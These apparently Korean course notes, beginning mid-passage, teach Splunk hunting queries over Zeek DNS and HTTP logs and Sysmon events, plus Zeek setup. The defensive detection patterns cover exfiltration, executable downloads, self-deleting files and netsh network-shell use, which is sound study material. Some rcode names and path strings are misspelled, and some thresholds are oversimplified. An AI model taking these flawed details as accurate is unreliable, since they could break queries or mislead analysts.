X라는 문자열을Y 라는 구분자를 이용해 분할 /data/utility/tool/GoogleToolbar.exe 를 split(uri,"/") 하면 총 4개로 분할된다. 인덱스는 0번부터 시작한다. data utility tool GoogleToolbar.exe

2) mvindex(X,Y,Z)

필드 X에 있는 Y번째 값은 반환 (Z는 생략가능)
여기서 Y는 인덱스 번호 (0번부터 시작)
Z값 지정 시 함수는 Y부터 Z까지의 값을 반환 /data/utility/tool/GoogleToolbar.exe 를 mvindex(split(uri,”/”), -1) 하면 /를 구분자로 총 4개로 분할 data utility tool GoogleToolbar.exe 후 GoogleToolbar.exe 를 반환한다.

*| eval passwd_str="lightdm:x:107:117:Light Display M a n a g e r :/var/lib/lightdm:/bin/false"
| eval uid=mvindex(split(passwd_str,":"),0)
| eval subuid1=substr(uid,2)
| eval subuid2=substr(uid,2,4)
| table uid, subuid1, subuid2

3) round(X,Y)

X를 Y 자리 수 기준으로 반올림
나누기 계산을 할 경우 소수점 자리가 급격히 늘어나는 것을 방지

4) strftime(X,Y)

유닉스 타임 X를 지정한 Y형식으로 출력
주로 사용자가 읽기 편한 형식으로 변환 할 때 사용
유닉스 타임(에포크 타임) 계산법은 1970년 1월 1일 0시를 기준으로 초를 계산

5. DNS 로그 분석 실습환경 구성

5.1. Index 만들기

리눅스 로그와 유사하게 /var/lib/splunk 위치에 로그가 있다.

5.2. Source Type 지정

쉼표로 구분된 필드 이름 ts,uid,src,spt,dst,dpt,proto,trans_id,rtt,domain,qclass,qclass_name,qtype,qtype_name,rcode,rcode_name,AA,TC,RD,RA,Z,answers,TTLs,rejected

5.3. 데이터 추가

내가 설정할 필드보다 많은 이유? Splunk에서 자동 인식해서 만들어낸 필드가 포함되어 있기 때문에

5.4. URL Toolbox 설치

표시여부가 No 로 되어 있으면 [속성 편집] 에서 예로 바꿔주기

앱이 정상적으로 설치되면 Splunk 메인화면에서 확인할 수 있다.

6. DNS 로그 분석

DNS 로그 필드

ts : 유닉스 시간
uid : 로그 id
----------- ▼ TCP/IP헤더에서 알 수 있는 정보 ----------
id.orig_h : 송신지IP주소
id.orig_p : 송신지 port번호
id.resp_h : 수신지IP주소
id.resp_p : 수신지 port번호
Protocol : 사용 프로토콜
------------- ▼ 여기서부터 DNS 로그 필드 ------------
trans_id : 질의와 응답을 연결하는 ID(DNS작업번호)
rtt : 응답시간 (-으로 표시되면 정상적으로 진행 X)
query : 도메인질의내용
DNS : 서버에 질의한 도메인
---------- ▼ Query 메세지를 보고 구성한 필드 ---------
qclassb : 질의클래스
qclass_name : 질의클래스 이름
qtype : 질의형식
qtype_name : 질의형식이름
-------- ▼ Responce 메세지를 보고 구성한 필드 --------
rcode : 답변코드

rcode_name : 질의한 도메인의 응답코드

rcode	rcode_name	서명
0	NoError	오류 없음
1	FromErr	Qury 형식 오류
2	SevFail	DNS 서버 자체의 문제로 실패
3	NXDomain	DNS 클라이언트가 존재하지 않는 도메인으로 질의
4	Notlmp	DNS 서버가 해당 질의를 지원 X
5	Refused	정책적인 이유로 질의를 거절

AA : 인증서버답변여부
TC : 전체질의가 잘렸는지 여부
RD : 재귀질의 요청여부
RA : 재귀질의 가능여부
Z : 예약된 필드로 사용하지 않음
Answers : DNS서버에서 반환한 답변내역
TTLs : 도메인의 TTL값, 질의 답변의 캐시보관기간 (3600초(1시간 기본))
Reject : 질의가 거부됐는지 판단

6.1. DNS 네트워크 현황 분석 항목

전반적인 통계치를 파악하기 위함이다. 현황분석 시 숫자에서 이상 징후를 유추해야 한다.

1) TOP 10 도메인 현황 분석

사용자가 가장 많이 접속한 도메인 10개
많이 접속한다는 것은 많은 사용자가 접속한다는 뜻이지만 소수의 클라이언트가 많이 접속할 수도 있다는 뜻이기도 함 (ex. 동일 도메인이 10분 동안 60번씩 요청할 경우, 매크로가 동작한다고 추측 가능)
네트워크 접속 행위를 분석 시 해당 트래픽이 사용자가 발생시킨 것인지, 자동 프로그램이 일으킨 행위인지를 분석의 기준으로 삼을 수 있음

index=dnslog sourcetype=dnslog domain!="-"
| eval list = "mozila"
| `ut_parse(domain,list)`
| table ut_netloc, ut_domain, ut_subdomain, ut_domain_without_tld, ut_tld
| dedup ut_netloc

index=dnslog : dnslog 저장소에서
sourcetype=dnslog : dnslog 필드를 갖고 있는 로그들만 분석
domain!="-" : domain 필드에 - 표시 즉, 값이 설정되어 있지 않은 로그는 제외
| eval list = "mozila" : list 라는 변수명에 "mozila" 라는 값을 선언
| ut_parse(domain,list) : URL의 domain을 mozila로 파싱 (URL Toolbox가 설치되었기 때문에 가능)
| table ut_netloc, ut_domain, ut_subdomain, ut_domain_without_tld, ut_tld : 테이블 형태로 필드 구성을 ut_netloc, ut_domain, ut_subdomain, ut_domain_without_tld, ut_tld 로 하기 (URL Toolbox에서 지원하는 필드)
| dedup ut_netloc : 중복된 ut_netloc 필드 값은 제거

ut_netloc(전체주소) : ztp.polycom.com
domain : polycom.com
subdomain : ztp
tld(Top Level Domain) : com

2) 사용자들이 가장 많이 접속한 도메인 10개를 검색

index=dnslog sourcetype=dnslog dpt=53 
domain!="*.arpa" 
domain!="-"
| eval list="mozilla" 
| `ut_parse(domain, list)`
| top showperc=f limit=10 ut_netloc

index=dnslog : dnslog 저장소에서
sourcetype=dnslog : dnslog 필드를 갖고 있는 로그들만 분석
dpt=53 : 수신지 포트 53
domain!="*.arpa" : 정방향 조회 A레코드만 (역방향 조회인 ptr 레코드는 제외)
domain!="-" : Query name 부분(도메인명)이 없으면 제외
| eval list="mozilla" : list 라는 변수에 "mozilla" 라는 값 부여
| ut_parse(domain, list) : 도메인을 mozilla 형식으로 분할
| top showperc=f limit=10 ut_netloc : 퍼센테이지 제외 결과값을 내림차순으로 10개만 보여주되 전체 주소를 보여줘

teredo.ipv6.microsoft.com 가 가장 많이 접속했다.

ut_netloc : teredo.ipv6.microsoft.com
domain : microsoft.com
subdomain : teredo.ipv6
tld : com

특정 몇몇 사람만 많이 접속했는지 여러 명이 접속했는지 파악할 필요가 있다.

3) 도메인과 해당 도메인을 접속한 송신지 IP주소를 동시에 검색

index=dnslog sourcetype=dnslog dpt=53 domain!="*.arpa" domain!="-" 
| eval list="mozilla" 
| `ut_parse(domain,list)` 
| top showperc=f src, ut_netloc

index=dnslog sourcetype=dnslog dpt=53 domain!="*.arpa" domain!="-" : dnslog 저장소에서 소스타입이 dnslog인 것 중 수신지 포트가 53이고 도메인이 역방향 조회인 것과 공란인 경우는 제외
src : 송신지 IP주소 src ---ut_netloc---> DNS

172.16.146.107 와 172.16.138.48가 teredo.ipv6.microsoft.com 에 비정상적으로 많은 접속 횟수로 보아 매크로를 돌렸을 가능성이 높다.

4) NXDomain이 빈번하게 발생하는 도메인과 해당 질의를 발생하는 송신지 모니터링

index=dnslog sourcetype=dnslog domain!="-" rcode_name= "NXDomain"
| top showperc=f src, domain

도메인 검색 시 오타가 날 수도 있기 때문에 NXDomain 이 1~2건 정도는 있을 수 있으나 지속적인 NXDomain이 발생하면 점검이 필요하다. 왜? 감염된 PC가 사라진 도메인에 접속을 시도하는걸수도 있기 때문에

💡 NXDomain이란? 존재하지 않는 도메인에 접속을 시도하는 경우 발생하는 에러

5) 비정상적인 서브 도메인 길이

💡 서브 도메인(Subdomain)

도메인 소유자가 생성하는 도메인명 (ex. aaa.bbb.naver.com 에서 서브 도메인은 aaa.bbb에 해당)
한국인터넷진흥원에서 도메인은 2~63자로 규정해두었다.
비정상적인 도메인 길이는 주로 서브 도메인을 의미

index=dnslog sourcetype=dnslog domain!="-" 
| where NOT cidrmatch(domain, "0.0.0.0/0") 
| eval list="Mozilla"
| `ut_parse(domain, list)`
| where NOT match(domain,"(microsoft.com|akamaized.net| amazonaws.com)$") 
| eval sub_len=len(ut_subdomain) 
| search sub_len > 20 
| table ut_domain, ut_subdomain, sub_len, sut_netloc

| where NOT cidrmatch(domain, "0.0.0.0/0") : 도메인명이 ip 형태로 나오면 ptr 레코드를 의미(역방향 조회). 도메인명에 IP주소 형태가 있으면 True ⇒ ptr 레코드 제외
| where NOT match(domain,"(microsoft.com|akamaized.net| amazonaws.com)$") : 정규표현식에서 $는 도메인 끝에서부터 봤을 때 microsoft.com|akamaized.net| amazonaws.com 인 건 제외 ⇒ 검색 대상에서 가상화를 지원해주는 사이트는 제외
| eval sub_len=len(ut_subdomain) : sub_len 변수에 서브 도메인의 길이를 부여
| search sub_len > 20 : sub_len이 20자 초과인 것만 찾기

💡 왜 서브 도메인 길이를 20자를 기준으로 하는지? 서브 도메인이 20자를 초과하면 난독화 현상을 진행되기 때문에 20자를 기준으로 한다. 공격자가 접속사이트를 숨기기 위해서 길게 만든다.

6) 비허가 DNS 사용

index=dnslog sourcetype=dnslog (dst!="172.16.142.11" AND dst!="172.16.142.12") (src!="172.16.142.11" AND src!="172.16.142.12") 
| stats count by dst 
| sort - count

위조 DNS 서버를 쓰고 있는지 찾아내는 작업

index=dnslog sourcetype=dnslog (dst!="172.16.142.11" AND dst!="172.16.142.12") (src!="172.16.142.11" AND src!="172.16.142.12") : DNS 서버주소는 질의할 때는 dst지만 응답할 때는 src가 된다. ⇒ 수신지 IP 주소나 송신지 IP주소가 172.16.142.11 나 172.16.142.12 가 아닌 로그만
| stats count by dst : dst 필드 값에 따라 이벤트 수를 계산
| sort - count : count 필드 값을 기준으로 검색 결과를 내림차순으로 정렬

7. HTTP 로그 분석 실습환경 구성

7.1. Index 생성

7.2. Source Type 지정

쉼표로 구분된 필드 이름 : ts,uid,src,spt,dst,dpt,trans_depth,method,domain,uri,referrer,version,user_agent,request_body_len,response_body_len,status_code,status_msg,info_code,info_msg,tags,username,password,proxied,orig_fuids,orig_filenames,orig_mime_types,resp_fuids,resp_filenames,resp_mime_types

7.3. 데이터 추가

8. HTTP 로그 분석

HTTP 로그 필드

ts : 유닉스 시간
uid : 로그 id
-----------▼ IP헤더에서 알 수 있는 정보----------
id.orig_h : 송신지IP주소
id.orig_p : 송신지 port번호
id.resp_h : 수신지IP주소
id.resp_p : 수신지 port번호
-----------------▼ HTTP 로그 필드---------------
trans_depth : 질의와 응답을 연결하는 ID
method : 요청방식
host : 접근 도메인
uri : 도메인 제외 상세주소
referrer : Host 접속시 경유주소
version : HTTP 버전
user_agent : 웹브라우저 정보
request_body_len : 서버에게 전송하는 정보길이
response_body_len : 사용자에게 전송하는 정보길이
status_code : 상태코드
status_msg : 상태 메세지
tags
Proxied : 프록시 접속 여부
resp_fuids : 연결된 파일 ID
resp_mime_types : 전송파일 mime type

8.1. HTTP 네트워크 현황 분석 항목

1) 사용자들이 가장 많이 접속하는 도메인을 추출해서 접속현황 분석

index=httplog sourcetype=httplog domain!="(empty)" 
| iplocation dst 
| where NOT cidrmatch("0.0.0.0/0", domain) 
| stats sum(request_body_len) as "Outbound", sum(response_body_len) as "Inbound" by domain, Country 
| eval Outbound=round(Outbound/(1024*1024),2) 
| eval Inbound=round(Inbound/(1024*1024),2) 
| sort Outbound desc 
| head 10

index=httplog sourcetype=httplog domain!="(empty)" : httplog 저장소에서 httplog 필드가 있고, 도메인이 빈 칸인 로그(host명 명시X)를 제외한 로그
| iplocation dst : 수신지 IP를 보고 지역정보를 알려줘
| where NOT cidrmatch("0.0.0.0/0", domain) : 도메인에 IP주소가 포함되지 않는 로그만
| stats sum(request_body_len) as "Outbound", sum(response_body_len) as "Inbound" by domain, Country : 도메인과 국가의 request_body_len의 합계를 Outbound라고 Rename, response_body_len의 합계를 Inbound 라고 Rename ⇒ Request는 나가는거고, Response는 들어오는거라서
| eval Outbound=round(Outbound/(1024*1024),2) : 메가바이트로 처리하고 소숫점 2자리까지 반올림하고 Outbound 변수에 값 할당
| eval Inbound=round(Inbound/(1024*1024),2) : 메가바이트로 처리하고 소숫점 2자리까지 반올림하고 Inbound 변수에 값 할당
| sort Outbound desc : Outbound 필드를 내림차순으로 정렬
| head 10 : 검색 결과 중 상위 10개만

💡 대부분 Request Body Length < Response Body Length 지만 Request Body Length > Response Body Length 경우는 PUT 메소드를 사용할 경우에는 가능

송신지 IP가 1개인데 특정 사이트에 2627번 접속했다면 점검해볼 필요가 있다.

보통 직원들이 접속하는 사이트의 국가는 정해져 있는데 희안한 국가 사이트가 있다면 프록시를 사용중일 수 있기 때문에 모니터링할 필요가 있다.

2) 클라이언트가 서버에 자원을 요청하는 방식 분식

index=httplog sourcetype=httplog uri!="-" 
| top method limit=10 showperc=f

index=httplog sourcetype=httplog uri!="-" : httplog 저장소에서 소스타입이 httplog면서 uri가 없는 건 제외한 로그만
| top method limit=10 showperc=f : 메소드별로 카운트해서 퍼센테이지 없이 상위 10개만

3) Top 10 클라이언트 오류

index=httplog sourcetype=httplog uri!="-" uri!="/" (status_code >=400 AND status_code < 500) 
| top domain, status_code limit=10 showperc=f

index=httplog sourcetype=httplog uri!="-" uri!="/" (status_code >=400 AND status_code < 500) : httplog 저장소의 httplog 필드에서 uri가 없거나 메인페이지인 경우는 제외한 클라이언트 오류(4xx)가 발생한 로그만
- 4xx : 클라이언트측 에러
  - 400 : 문법적 오류
  - 401 : 인증 실패
  - 403 : 접근 권한이 없는 리소스를 요청
  - 404 : 존재하지 않는 리소스를 요청

4) Top 10 서버 오류

index=httplog sourcetype=httplog uri!="-" status_code >= 500
| top domain, status_code limit=10 showperc=f

index=httplog sourcetype=httplog uri!="-" status_code >= 500 : httplog 저장소의 httplog 필드에서 uri가 없는 건 제외하고 서버 오류(5xx)가 발생한 로그만
- 5xx : 서버측 에러
  - 500 : 소프트웨어상(애플리케이션) 오류
  - 501 : 웹에서 요청한 메소드가 서버에서 허용하는 것이 아닐 경우
  - 502 : 서버와 클라이언트를 중계해주는 프록시에 문제가 발생할 경우
    - 웹에서 게이트웨이는 프록시를 의미
  - 503 : 하드웨어상(RAM,CPU) 오류

5) HTTP 상태 코드

index=httplog sourcetype=httplog domain!="(empty)" status_code!="-" 
| top limit=10 showperc=f status_code

HTTP 응답코드별로 카운팅해서 상위 10개까지만 표시

9. HTTP 이상징후

9.1. 비정상 메소드 사용

1) 메소드가 OPTIONS 인 경우

index=httplog sourcetype=httplog 
| stats count(eval(method="OPTIONS")) AS option_count by src 
| where option_count > 10 
| sort option_count desc

index=httplog sourcetype=httplog : httplog 저장소에서 소스타입이 httplog인 로그
| stats count(eval(method="OPTIONS")) AS option_count by src : 송신지IP(src)에서 메소드가 OPTIONS인 걸 카운팅해서 option_count로 명명
| where option_count > 10 : option_count가 10개 이상인 것만
| sort option_count desc : option_count 기준으로 내림차순으로 정렬

2) 메소드가 GET, POST, - 인 경우 제외한 나머지

index=httplog sourcetype=httplog 
| where NOT match(method, "(GET|POST|-)")
| stats count(src) as src_count by method 
| sort - src_count

index=httplog sourcetype=httplog : httplog 저장소에서 소스타입이 httplog인 로그
| where NOT match(method, "(GET|POST|-)") : 메소드가 GET, POST, - (비정상 요청) 제외한 것만
| stats count(src) as src_count by method : 메소드에서 송신지IP(src)를 카운트해서 src_count로 명명
| sort - src_count : src_count를 기준으로 내림차순으로 정렬

9.2. 외부행 데이터 전송

index=httplog sourcetype=httplog (request_body_len!=0 OR response_body_len!="0") domain!="-" 
| stats sum(request_body_len) as outTotal sum(response_body_len) as inTotal by src, dst 
| eval oMB=round(outTotal/(1024*1024),2) 
| eval iMB=round(inTotal/(1024*1024),2) 
| search oMB!=0 AND iMB!=0 
| iplocation dst 
| eval isUp=if((oMB/iMB)>1, "Yes","No") 
| where isUp="Yes" 
| table src,dst, iMB, oMB, Country, City

index=httplog sourcetype=httplog (request_body_len!=0 OR response_body_len!="0") domain!="-" : httplog 저장소에서 소스타입이 httplog면서 request_body_len나 response_body_len가 0이 아니고 도메인이 공란이 아닌 로그
| stats sum(request_body_len) as outTotal sum(response_body_len) as inTotal by src, dst : 송신지 IP주소와 수신지 IP주소에서 request_body_len의 합계를 구해서 outTotal로 명명하고, response_body_len의 합계를 구해서 inTotal로 명명
| eval oMB=round(outTotal/(1024*1024),2) : outTotal을 메가 바이트로 처리하고 소숫점 2자리까지 반올림한 후 oMB 변수에 할당
| eval iMB=round(inTotal/(1024*1024),2) : inTotal을 메가 바이트로 처리하고 소숫점 2자리까지 반올림한 후 iMB 변수에 할당
| search oMB!=0 AND iMB!=0 : oMB(request)와 iMB(response) 값이 0이 아닌 것만 검색
| iplocation dst : 수신지 IP주소에서 국가코드 추출
| eval isUp=if((oMB/iMB)>1, "Yes","No") : oMB(request)나 iMB(response)가 1 이상이면 Yes 아니면 No 값을 isUP 변수에 할당
| where isUp="Yes" : isUP이 Yes인 것만
| table src,dst, iMB, oMB, Country, City : 테이블로 보여주되 필드는 src, dst, iMB, oMB, Country, City로 구성

9.3. Mime-type과 파일 확장자 불일치

index=httplog sourcetype=httplog resp_mime_types="application/x-dosexec" uri!="-" 
| eval filename1=mvindex(split(uri,"/"),-1) 
| eval filename=if(like(filename1,"%?%"), mvindex(split(filename1,"?"),0),filename1) 
| eval filetype=if(match(filename,"(.exe|.bat|.ps1|.dll|.ocx)$"), "PE", "Not_PE") 
| table domain, uri, filename, filetype, resp_mime_types 
| where filetype=="Not_PE" 
| dedup filename

index=httplog sourcetype=httplog resp_mime_types="application/x-dosexec" uri!="-" : httplog 저장소에서 소스타입이 httplog이고, 미디어 타입이 DOS 실행 파일이면서 uri가 없는 것은 제외한 나머지 로그
| eval filename1=mvindex(split(uri,"/"),-1) : uri를 /를 기준으로 분할 후 인덱스 번호가 -1번인 것을 filename1 변수에 할당
| eval filename=if(like(filename1,"%?%"), mvindex(split(filename1,"?"),0),filename1) : 만약 filename1에 ?가 있으면 ?를 기준으로 filename1을 분할 후 인덱스 번호가 0번인 것을 filename 변수에 할당하고, ?가 없으면 그냥 filename1을 filename 변수에 할당 ⇒ 파일명을 검출하기 위함
| eval filetype=if(match(filename,"(.exe|.bat|.ps1|.dll|.ocx)$"), "PE", "Not_PE") : 만약 filename에 끝부분이 .exe, .bat, .ps1, .dll, .ocx 인 경우 "PE" 값을 filetype 변수에 할당하고, 아닌 경우 "Not_PE" 를 filetype 변수에 할당 ⇒ 파일 확장자를 검출하기 위함
| table domain, uri, filename, filetype, resp_mime_types : 테이블을 domain, uri, filename, filetype, resp_mime_types 필드로 구성
| where filetype=="Not_PE" : filetype이 "Not_PE"인 것만
| dedup filename : filename 중복 제거

✅ 체크포인트 Request 헤더의 Accept는 Response 헤더의 Content-type Request 헤더의 Accept은 받아들일 수 있는 데이터 타입을 MIME타입으로 표현하여 알려줌 Response 헤더의 Content-type은 body의 메세지 본문의 데이터 타입

💡 MIME은 그냥 표현 형식 Request 헤더에 있는 accept : text/html 을 예로 들자면 받아들일 수 있는 데이터 타입(accept)이 MIME 타입(text/html)으로 표현되었다고 말한다.

💡 MZ 실행파일이란? DOS에서 .EXE 실행 파일에 사용되는 파일 형식

파일 확장자 : .exe
인터넷 미디어 타입
- application/x-dosexec
- application/x-msdos-program
- application/x-ms-dos-executable

9.4. 사이트 이동 후 실행파일 다운로드

index=httplog sourcetype=httplog referrer!="-" status_code=200 
| eval filename1=mvindex(split(uri,"/"),-1) 
| eval filename=if(like(filename1,"%?%"), mvindex(split(filename1,"?"),0),filename1) 
| where cidrmatch("0.0.0.0/0",domain) 
| where match(resp_mime_types,"application/x-dosexec") OR match(filename,"(exe|dll|com|src)$") 
| eval URL=domain+" :: " + filename 
| stats count by src, URL 
| stats list(URL) as Target list(count) as Source by src

index=httplog sourcetype=httplog referrer!="-" status_code=200 : httplog 저장소에서 소스타입이 httplog고, 경유지가 있는 HTTP 응답코드가 200인 로그
| eval filename1=mvindex(split(uri,"/"),-1) : uri를 /로 분할하고 인덱스 번호가 -1번인 것을 filename1 변수에 할당 ⇒ 파일명을 검출하기 위함
| eval filename=if(like(filename1,"%?%") mvindex(split(filename1,"?"),0),filename1) : 만약 filename1에 ?가 있으면 ?를 기준으로 filename1을 분할 후 인덱스 번호가 0번째인 것을 filename 변수에 할당하고, ?가 없으면 그냥 filename1을 filename 변수에 할당
| where cidrmatch("0.0.0.0/0",domain) : 도메인에 IP주소가 들어가는지
| where match(resp_mime_types,"application/x-dosexec") OR match(filename,"(exe|dll|com|src)$") : 미디어 타입이 DOS 실행 파일이거나 filename의 끝부분이 exe, dll, com, src인 것
| eval URL=domain+" :: " + filename : 도메인과 ::와 filename을 결합한 값을 URL 변수에 할당
| stats count by src, URL : 송신지 IP주소(src)와 URL을 카운팅
| stats list(URL) as Target list(count) as Source by src : 송신지 IP주소(src)에서 URL을 Target으로 명명하고, 카운팅한 값을 Source로 명명

⇒ DBD 공격을 위한 실행 파일이 있는지 확인하기 위함

9.5. 프록시 서버 접속

index=httplog sourcetype=httplog (uri="http://*" OR method="connect") 
| table src, domain, uri

index=httplog sourcetype=httplog (uri="http://*" OR method="connect") : httplog 저장소에서 소스타입이 httplog고, uri가 http:// 로 시작하거나 메소드가 connect인 로그
| table src, domain, uri : 테이블을 src, domain, uri로 구성

✅ 체크포인트

Request 메소드가 Connect면 프록시를 경유해 들어왔음을 알 수 있다.
URI에 프로토콜부터 전체 주소가 보여지면 프록시를 사용했음을 알 수 있다.

10. Sysmon

10.1 정의

윈도우 운영체제에 설치되는 시스템 모니터링 툴

10.2 목적

기본 윈도우 이벤트 뷰어에서는 프로세스 생성, 네트워크 연결, 파일 생성 시간 변경 등의 정보를 추출한 후 윈도우 이벤트 저장소에 저장할 수 없기 때문에 ⇒ 이벤트 기반 정보가 아닌 행동 기반 정보를 수집해서 이벤트 저장소에 저장

10.3. 생성 이벤트

11. EndPoint

일반적으로 클라이언트 PC를 지칭하는 말

12. EndPoint 로그 분석 실습환경 구성

EndPoint로그 == 윈도우 로그를 기반 ⇒ 악성코드에 감염된 PC들의 이상징후를 탐지

1) Sysmon 설치

2) sysmon 로그 데이터를 Splunk 저장소에 넣기

이렇게 하는 이유? 원래 Forworder 에서 실시간으로 로그를 받아와야하지만 그게 현재 불가능하기 때문에

3) Splunk 서버 재시작

설정 > 시스템 > 서버 컨트롤

4) sysmon 로그 데이터 확인

검색창에 index=sysmon 을 검색했을 때 로그가 뜨면 성공!

이벤트 뷰어 > 응용 프로그램 및 서비스 로그 > Microsoft > Sysmon > Operational

13. PC 이상 징후 분석

13.1. 비정상 폴더에서 exe 파일 실행

윈도우 실행파일(시스템폴더) 위치
- C:\Program Files
- C:\Program Files(x86)
- C:\Windows
- C:\Windows\system32
일반적으로 공격에 사용되는 악성코드는 단독 실행 파일로 동작
시스템 폴더에 설치되지 않음 ⇒ 프로그램의 실행 경로를 판단한다면 이상징후를 판별 가능
인터넷으로 다운로드한 악성코드가 처음부터 시스템 폴더에 복사되지는 않기 때문에 최초 실행 폴더를 기반으로 탐지하는 방법은 유효함
백도어 프로그램은 윈도우 정상 파일의 대체로 C:\Windows\System32에 설치되기도 함

index=sysmon sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
(CurrentDirectory!="*Program FIles*" AND CurrentDirectory!="*system32*")
(Image!="*system32*" AND Image!="*Program FIles*" AND Image!="*SysWOW64*")
[search index=sysmon sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1
| rare CurrentDirectory limit=10 showperc=f showcount=f]
| table Image

EventCode=1 : 프로세스 생성을 의미 ⇒ exe 파일이 정상적으로 실행됨
(CurrentDirectory!="*Program FIles*" AND CurrentDirectory!="*system32*") (Image!="*system32*" AND Image!="*Program FIles*" AND Image!="*SysWOW64*") : 실행 파일이 들어있는 디렉터리로 Program Files, System32, SysWOW64 등은 제외
[search index=sysmon sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 | rare CurrentDirectory limit=10 showperc=f showcount=f] : 2차 검색, 하위 검색 ⇒ 검색 범위를 줄이기 위함

13.2. 파일 실행 후 원본 파일 삭제

💡 프로그램과 프로세스의 차이 프로그램 : 하드디스크에 저장된 소스코드 (정적인 상태) 프로세스 : 실행 중인 프로그램

하드 디스크에 저장된 악성코드는 프로세스 상태가 되어야 PC들을 감염시킬 수 있음
악성코드 파일 실행 후 원본파일을 디스크에서 삭제해서 분석을 회피하기도 함 ⇒ 프로그램을 실행 후 원본 파일을 디스크에서 삭제하는 행위는 정상 행위가 아님

index=sysmon sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 ParentImage="C:\\windows\\explorer.exe"
[search index=sysmon sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational"
| where NOT isnull(Image) AND NOT isnull(ParentImage)
| search CommandLine="* del *"
| table ParentImage
| rename ParentImage AS Image
] | table Image

EventCode=1 ParentImage="C:\\windows\\explorer.exe" : 파일탐색기를 이용하여 실행된 파일 검색
[search index=sysmon sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" | where NOT isnull(Image) AND NOT isnull(ParentImage) | search CommandLine="* del *" : 하드디스크에서 실행된 파일을 검색 후 삭제된 파일이 있다면 해당 파일의 원본 이름을 알려줘

13.3. 실행 후 네트워크 접속 다수 발생

index=sysmon sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 
(Image!="C:\\Windows*" AND Image!="*Program FIles*")
[search index=sysmon sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational"  EventCode=3
 (DestinationIp!="10.0.0.0/8" AND DestinationIp!="172.16.0.0/12" AND DestinationIp!="192.168.0.0/16")
 | stats count(DestinationIp) AS total_count dc(DestinationIp) AS uniq_count by Image
 | where total_count > 50 OR uniq_count > 20 
 | table Image]
| table Image

⇒ 디도스 공격을 찾아낼 때 사용하는 검색어

index=sysmon sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 : 프로세스가 실행된 파일을 찾고
(Image!="C:\\Windows*" AND Image!="*Program FIles*") : Windows나 Program 디렉토리 밑에서 실행된 파일은 제외
[search index=sysmon sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=3 : 네트워크 로그만 검색
(DestinationIp!="10.0.0.0/8" AND DestinationIp!="172.16.0.0/12" AND DestinationIp!="192.168.0.0/16") : 수신지 IP주소가 사설주소인 건 제외 ⇒ 수신지가 공인IP인 로그들만 검색
| where total_count > 50 OR uniq_count > 20 : 수신지 IP로 50회 이상 접속되면

13.4. 네트워크 Shell 실행

웹쉘 파일명을 기반으로 검색하는 수 밖에 없음

시그니처를 기반으로 찾아내려면 IDS를 사용

index=sysmon sourcetype="WinEventLog:Microsoft-Windows-Sysmon/Operational" EventCode=1 
| where match(Image, "netsh.exe$")
| where NOT isnull(ParentImage)
| table ParentImage, Image, COmmandLine

where match(Image, "netsh.exe$") 윈도우 탐색기를 통해서

[SK shieldus Rookies 16기][클라우드기반 시스템 운영 및 구축] Zeek, HTTP/DNS/SSL/x.509 로그 필드, 로그 확인 및 전송 실습

Wed, 10 Jan 2024 00:40:35 GMT

1. Zeek

1.1. 정의

네트워크 침입 탐지 시스템(NIDS)와 Bro가 Zeek 이라는 프로토콜 분석툴로 이름이 변경됐다.
네트워크를 모니터링 할 수 있는 오픈 소스 프로그램

1.2. 목적 및 기능

패킷 수집
TCP/IP 헤더를 분석
응용 프로토콜의 헤더를 분석
프로토콜별 분류
프로토콜별 로그 생성

2. Zeek 설치방법

$ apt update 
$ apt-get install curl gnupg2 wget –y
$ curl -fsSL https://download.opensuse.org/repositories/security:zeek/xUbuntu_20.04/Release.key | gpg --dearmor | tee /etc/apt/trusted.gpg.d/security_zeek.gpg
$ echo 'deb http://download.opensuse.org/repositories/security:/zeek/xUbuntu_20.04/ /' | tee /etc/apt/sources.list.d/security:zeek.list

$ apt update -y
$ apt-get install zeek -y

$ echo "export PATH=$PATH:/opt/zeek/bin" >> ~/.bashrc
$ source ~/.bashrc
$ zeek --version

3. Zeek 환경설정

$ cd /otp/zeek/etc
$ nano networks.cfg

3.1. 관제할 네트워크 등록하기

3.2. 관제할 네트워크 타입

3.3. 로그가 저장될 위치 확인

3.3. Zeek 활성화

$ zeekctl check
$ zeekctl deploy
$ zeekctl status

4. 로그 확인

WebServer 가상머신

$ service httpd start
$ service iptables start

$ cd /opt/zeek/spool/zeek
$ ls -l

4.1. Zeek HTTP 로그 필드

$ nanao http.log

4.2. Zeek DNS 로그 필드

$ nanao dns.log

4.3. Zeek SSL 로그 필드

4.4. Zeek X.509 로그 필드

4.5. 오래된 로그는 어디로?

/opt/zeek/spool/zeek 에서 일정 시간이 지나면 로그를 압축 파일로 만들어 /opt/zeek/logs 에 날짜별로 저장해 놓는다.

$ cd /opt/zeek/logs
$ ls -l

$ cd 2024-01-09
$ ls -l

5. 로그 전송

5.1. Splunk - tcp 22포트 방화벽 열기

tcp 22포트 방화벽 열기

/tmp 는 sticky bit 설정이 되어 있기 때문에 기타 사용자도 여기에 파일을 만들 수 있다. 별도의 로그 디렉토리를 만들지 않고 /tmp를 사용할 것이다.

5.2. ZeekIDS - Splunk 에게 http.log 파일 전송하기

$ scp http.log splunk@192.168.10.10:/tmp

5.3. Splunk - 전송된 로그 확인

/tmp 에서 파일 리스트를 확인하면

[SK shieldus Rookies 16기][클라우드기반 시스템 운영 및 구축] Web 구조

Tue, 09 Jan 2024 05:02:34 GMT

1. HTTP

1.1. 정의

클라이언트와 서버 사이의 웹 문서를 송수신해주는 프로토콜

1.2. 3-Tier Web System Architecture

Front Server (Web Server)
Application Server
DB Server

1.3. URL 구조

https://search.naver.com/search.naver?where=nexearch&sm=top_hty&fbm=0&ie=utf8&query=kbs

도메인 : search.naver.com
uri : /search.naver?where=nexearch&sm=top_hty&fbm=0&ie=utf8&query=kbs
DB질의조건 : ?where=nexearch&sm=top_hty&fbm=0&ie=utf8&query=kbs

1.4. Version

HTTP 1.0 : 텍스트용 세션을 맺고 close 했다가 이미지용 세션을 다시 맺고 close한다. ⇒ 각 요청마다 새로운 세션을 생성하고 종료하는 방식(단기 커넥션)
